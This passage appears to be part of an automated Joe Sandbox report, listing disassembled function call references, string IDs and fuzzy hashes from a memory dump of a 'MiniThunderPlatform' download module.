                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$CompletionCreateErrorLastPort
                                                                                                                                              • String ID: recv_buffer_size$set_recv_buffer$socket
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001328
                                                                                                                                              • ??0_Lockit@std@@QAE@H@Z.MSVCP71(00000000,?), ref: 10001336
                                                                                                                                              • ??Bid@locale@std@@QAEIXZ.MSVCP71 ref: 1000134E
                                                                                                                                              • ?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP71(00000000), ref: 10001358
                                                                                                                                              • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@@Z.MSVCP71(?), ref: 1000136F
                                                                                                                                              • ??0bad_cast@@QAE@PBD@Z.MSVCR71(bad cast), ref: 10001383
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B1DB4), ref: 10001392
                                                                                                                                              • ?_Incref@facet@locale@std@@QAEXXZ.MSVCP71(00000000), ref: 100013A5
                                                                                                                                              • ?_Register@facet@locale@std@@QAEXXZ.MSVCP71 ref: 100013AD
                                                                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP71 ref: 100013BB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Lockit@std@@$??0_??0bad_cast@@??1_Bid@locale@std@@D@std@@ExceptionGetcat@?$ctype@Getfacet@locale@std@@H_prologIncref@facet@locale@std@@Register@facet@locale@std@@ThrowVfacet@12@Vfacet@locale@2@@
                                                                                                                                              • String ID: bad cast
                                                                                                                                              • API String ID: 27869159-3145022300
                                                                                                                                              • Opcode ID: 9569fc945d2a7ec4c6dbbc7ff8a21b6216d618267ef0baa061772fad66a3279a
                                                                                                                                              • Instruction ID: a4d00f82965f1c3e8cd9e560848bcd5521387feb246623fb74d34d844d43f995
                                                                                                                                              • Opcode Fuzzy Hash: 9569fc945d2a7ec4c6dbbc7ff8a21b6216d618267ef0baa061772fad66a3279a
                                                                                                                                              • Instruction Fuzzy Hash: 3F118F35900226DBCB24EBA4CC8C9EDB775FB1C761F410659F426A7290DB309944CB50
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100D14FF
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(cmd_report_notstable), ref: 100D1518
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(max_url_length), ref: 100D152E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(hub_agent), ref: 100D1540
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,000000FF), ref: 100D156F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D157C
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1007196D
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 10071984
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env), ref: 10071998
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719CF
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719DE
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719ED
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100D159F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D15AC
                                                                                                                                                • Part of subcall function 10071870: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(product_flag,00000000,0000009C,?), ref: 10071896
                                                                                                                                                • Part of subcall function 10071870: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100718AD
                                                                                                                                                • Part of subcall function 10071870: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071909
                                                                                                                                                • Part of subcall function 10071870: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007191B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??4?$basic_string@?assign@?$basic_string@H_prologV01@V12@V12@@
                                                                                                                                              • String ID: cmd_report_notstable$hub_agent$max_url_length
                                                                                                                                              • API String ID: 4173776902-3985622789
                                                                                                                                              • Opcode ID: 6387a3dbb02fd25aa3ae8b0a38e6f5e7df321d04092926fb6c50b7860f158a29
                                                                                                                                              • Instruction ID: ba84631ba7c91fdd1d893faa30b1ed561a9193cd5eb578d5811c23d93aa27981
                                                                                                                                              • Opcode Fuzzy Hash: 6387a3dbb02fd25aa3ae8b0a38e6f5e7df321d04092926fb6c50b7860f158a29
                                                                                                                                              • Instruction Fuzzy Hash: 84213B75800224DFD714DBA4C98DBDDB7F8FF18351F10829AE45AA32A0DB706A49CF25
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_dphub_res,?), ref: 100B1622
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B1651
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_nondphub_res), ref: 100B1660
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B169F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_overlap_res), ref: 100B16AE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B16ED
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@
                                                                                                                                              • String ID: bytes_from_dphub_res$bytes_from_nondphub_res$bytes_from_overlap_res$p2p_sub_task_for_dphub
                                                                                                                                              • API String ID: 1506095285-3153554061
                                                                                                                                              • Opcode ID: 33a4947e444ab5fc0064a253755aa5efe60d1d840d95205bf3cbbe3263e87969
                                                                                                                                              • Instruction ID: 1ccc0651ecc7e168be8c7fbdb582b601ef0a971fe2eda536788b223ebae38d96
                                                                                                                                              • Opcode Fuzzy Hash: 33a4947e444ab5fc0064a253755aa5efe60d1d840d95205bf3cbbe3263e87969
                                                                                                                                              • Instruction Fuzzy Hash: 39515D791087409FC315CF68C888A9BBBF5FFD9704F544A5DF59A832A1DB35A844CB12
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Location), ref: 10095739
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009575F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10095780
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10095793
                                                                                                                                              • ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71 ref: 100957AE
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(102768F0), ref: 100957C7
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000000), ref: 100957DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?), ref: 100957F3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009580A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$??$?8??4?$basic_string@?erase@?$basic_string@?find_first_not_of@?$basic_string@D@1@@std@@D@2@@0@0@V01@V12@V?$basic_string@
                                                                                                                                              • String ID: Location
                                                                                                                                              • API String ID: 3948317842-2817059741
                                                                                                                                              • Opcode ID: 814f40ab18642fa11b77977b6ca5781ad7b63ccc6de718692a511786fbd09a5f
                                                                                                                                              • Instruction ID: a37594c30a467000d0f392824ff80e6cb15a7d6866cf3dc99a8fd1be633cf314
                                                                                                                                              • Opcode Fuzzy Hash: 814f40ab18642fa11b77977b6ca5781ad7b63ccc6de718692a511786fbd09a5f
                                                                                                                                              • Instruction Fuzzy Hash: C1319A31208351EFC310DF55D898BAABBE4FBA9755F40461CF85A83291DB71A948CF52
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009560E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Transfer-Encoding,?,?), ref: 100955E9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?), ref: 10095633
                                                                                                                                              • ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(1027B92C,00000000,00000002), ref: 1009564E
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000000), ref: 10095665
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(chunked), ref: 10095674
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1009569B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100956A9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8?erase@?$basic_string@?find_first_not_of@?$basic_string@D@1@@std@@D@2@@0@0@V12@V?$basic_string@
                                                                                                                                              • String ID: Transfer-Encoding$chunked
                                                                                                                                              • API String ID: 3701770573-3440583460
                                                                                                                                              • Opcode ID: 9dc44b9381dc6de4f8c1bf22363c9373e1b479e428e33b08bb8e1d02433cd211
                                                                                                                                              • Instruction ID: 05b01f3e2dddfeea48f4f04059fd789c431ba5689ed30b1c55635bd368ba9534
                                                                                                                                              • Opcode Fuzzy Hash: 9dc44b9381dc6de4f8c1bf22363c9373e1b479e428e33b08bb8e1d02433cd211
                                                                                                                                              • Instruction Fuzzy Hash: 6431F232508750DFC320CF24C898BAAB7E8FFA9751F40060DF59A832A1DB71A848CF52
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009560E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?), ref: 10095633
                                                                                                                                              • ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(1027B92C,00000000,00000002), ref: 1009564E
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000000), ref: 10095665
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(chunked), ref: 10095674
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Transfer-Encoding,?,?), ref: 100955E9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1009569B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100956A9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8?erase@?$basic_string@?find_first_not_of@?$basic_string@D@1@@std@@D@2@@0@0@V12@V?$basic_string@
                                                                                                                                              • String ID: Transfer-Encoding$chunked
                                                                                                                                              • API String ID: 3701770573-3440583460
                                                                                                                                              • Opcode ID: 78fb22c841259e9b0d5e68790cb9bcaf28de9ca6dd4d9491dc4e4a018920333b
                                                                                                                                              • Instruction ID: a9e1fa13d08dc8662eb5a1eea4d2872ee8004d653eb6d114c6f60a8308318921
                                                                                                                                              • Opcode Fuzzy Hash: 78fb22c841259e9b0d5e68790cb9bcaf28de9ca6dd4d9491dc4e4a018920333b
                                                                                                                                              • Instruction Fuzzy Hash: FA217E315083519FD324DF20C898BAAB7E4FFA9745F44450DF59A832A2DB71A548CF52
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100F02A6
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(cmd_report_correction,?,?,?), ref: 100F02C1
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,7C3F18B8,?,?,?), ref: 100F02E1
                                                                                                                                              • memset.MSVCR71(?,00000000,00000014,?,?,?), ref: 100F02F1
                                                                                                                                              • memset.MSVCR71(?,00000000,00000014,?,00000000,00000014,?,?,?), ref: 100F030C
                                                                                                                                                • Part of subcall function 100F020E: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,100F031F,?,?,?,?,?,?), ref: 100F0225
                                                                                                                                                • Part of subcall function 1006E2C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E2FD
                                                                                                                                                • Part of subcall function 1006E2C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1006E342
                                                                                                                                                • Part of subcall function 1006E2C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E354
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?,?,?), ref: 100F032F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?), ref: 100F033C
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1007196D
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 10071984
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env), ref: 10071998
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719CF
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719DE
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719ED
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?,?,?,?), ref: 100F035F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?), ref: 100F036C
                                                                                                                                                • Part of subcall function 10071870: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(product_flag,00000000,0000009C,?), ref: 10071896
                                                                                                                                                • Part of subcall function 10071870: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100718AD
                                                                                                                                                • Part of subcall function 10071870: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071909
                                                                                                                                                • Part of subcall function 10071870: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007191B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$V12@$?assign@?$basic_string@V12@@memset$??3@??4?$basic_string@?erase@?$basic_string@H_prologV01@V01@@
                                                                                                                                              • String ID: cmd_report_correction
                                                                                                                                              • API String ID: 1890770410-1491319297
                                                                                                                                              • Opcode ID: acfda1c071765056ba1b3996095e549eded5f96e8e74304fbf6ab59c212d972f
                                                                                                                                              • Instruction ID: ccb9c1e614a26c9718e78f5b2bb1a5c7b9b7f6c29721df8e35743f53bdcff324
                                                                                                                                              • Opcode Fuzzy Hash: acfda1c071765056ba1b3996095e549eded5f96e8e74304fbf6ab59c212d972f
                                                                                                                                              • Instruction Fuzzy Hash: B7218C71900614EFD724DFA5CC8DADAB7F8FF58710F00465DE06A932A1EB706949CB20
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1007558E
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • memcpy.MSVCR71(0000008C,?,?), ref: 10075607
                                                                                                                                              • memcpy.MSVCR71(000000A8,?,?), ref: 1007563B
